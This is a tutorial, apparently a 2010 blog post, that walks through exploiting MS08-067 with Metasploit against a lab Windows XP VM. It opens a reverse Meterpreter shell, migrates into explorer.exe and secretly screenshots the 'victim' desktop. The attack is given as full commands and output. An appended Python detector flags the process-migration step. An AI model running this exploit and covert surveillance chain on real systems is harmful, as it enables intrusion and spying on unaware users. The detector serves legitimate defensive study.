Taking Screenshots Of The Victim’s Computer With Metasploit

January 30, 2010 – 3:51 PM

Here’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module. Start with a basic exploit to gain a meterpreter session. You’ll need to make sure you migrate to a process that runs on the logged-on user’s interactive desktop (explorer.exe, for example); a session living in a service process has no access to that desktop and you will get nothing but blank images:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1100)

meterpreter > ps

Process list
============

PID   Name              Arch  User                           Path
---   ----              ----  ----                           ----
0     [System Process]
4     System            x86   NT AUTHORITY\SYSTEM
384   smss.exe          x86   NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
524   csrss.exe         x86   NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
556   winlogon.exe      x86   NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
692   services.exe      x86   NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
704   lsass.exe         x86   NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
876   VBoxService.exe   x86   NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\VBoxService.exe
904   svchost.exe       x86   NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
972   svchost.exe       x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1064  svchost.exe       x86   NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
1124  svchost.exe       x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1192  svchost.exe       x86   NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
1452  spoolsv.exe       x86   NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
284   explorer.exe      x86   VM-WINXP\Troy                  C:\WINDOWS\Explorer.EXE
624   VBoxTray.exe      x86   VM-WINXP\Troy                  C:\WINDOWS\system32\VBoxTray.exe
632   ctfmon.exe        x86   VM-WINXP\Troy                  C:\WINDOWS\system32\ctfmon.exe
656   alg.exe           x86   NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
1252  wscntfy.exe       x86   VM-WINXP\Troy                  C:\WINDOWS\system32\wscntfy.exe
1940  firefox.exe       x86   VM-WINXP\Troy                  C:\Program Files\Mozilla Firefox\firefox.exe

meterpreter > migrate 284
[*] Migrating to 284...
[*] Migration completed successfully.
meterpreter >

Now we load the espia module and view the victim’s live desktop:

meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]

meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >

The image should open automatically and display on your screen:

That’s it.  You are now viewing the victim’s desktop without them even knowing you are there.
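From the defender's side, the migration step above is the observable worth hunting for: a service-context process (the exploited service runs as SYSTEM) starting a thread inside the logged-on user's explorer.exe, which is exactly what `migrate 284` does. The following detector is an added example, not code from the original post or from Metasploit; it assumes Sysmon-style CreateRemoteThread records (Event ID 8) carrying SourceUser/TargetUser fields, which is an assumption about the schema, and runs over constructed sample events modelled on the process list above.

```python
# Added example, not code from the original post: flags the "migrate into the
# interactive user's process" step shown above. Records are constructed here and
# mimic a Sysmon-style CreateRemoteThread event (Event ID 8); the field names
# used are assumptions, not a guaranteed schema.

# Accounts that Windows services run under. A service-context process rarely
# needs to start a thread inside a logged-on user's process.
SERVICE_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}

# System processes that legitimately create remote threads in user processes
# (assumption for this sample; tune to your environment).
ALLOWLISTED_SOURCES = {"csrss.exe"}


def image_name(path):
    """File name of an image path such as C:\\WINDOWS\\Explorer.EXE, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def is_suspicious(event):
    """True when a service-account process injects into an interactive user's process."""
    src_user = event["SourceUser"].upper()
    tgt_user = event["TargetUser"].upper()
    if src_user not in SERVICE_ACCOUNTS or tgt_user in SERVICE_ACCOUNTS:
        return False  # user->user and service->service are out of scope here
    return image_name(event["SourceImage"]) not in ALLOWLISTED_SOURCES


def flag_remote_threads(events):
    """RecordIds of events matching the service-to-user migration pattern."""
    return [e["RecordId"] for e in events if is_suspicious(e)]


# Constructed sample events modelled on the process list in the post.
SAMPLE_EVENTS = [
    {"RecordId": "1", "SourceImage": "C:\\WINDOWS\\system32\\svchost.exe",
     "SourceUser": "NT AUTHORITY\\SYSTEM",
     "TargetImage": "C:\\WINDOWS\\Explorer.EXE", "TargetUser": "VM-WINXP\\Troy"},
    {"RecordId": "2", "SourceImage": "C:\\WINDOWS\\Explorer.EXE",
     "SourceUser": "VM-WINXP\\Troy",
     "TargetImage": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "TargetUser": "VM-WINXP\\Troy"},
    {"RecordId": "3", "SourceImage": "C:\\WINDOWS\\system32\\csrss.exe",
     "SourceUser": "NT AUTHORITY\\SYSTEM",
     "TargetImage": "C:\\WINDOWS\\Explorer.EXE", "TargetUser": "VM-WINXP\\Troy"},
]

if __name__ == "__main__":
    print(flag_remote_threads(SAMPLE_EVENTS))  # ['1']
```

Only the svchost.exe-to-explorer.exe event is flagged; the user's own explorer.exe starting a thread in firefox.exe and the allowlisted csrss.exe source are left alone.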
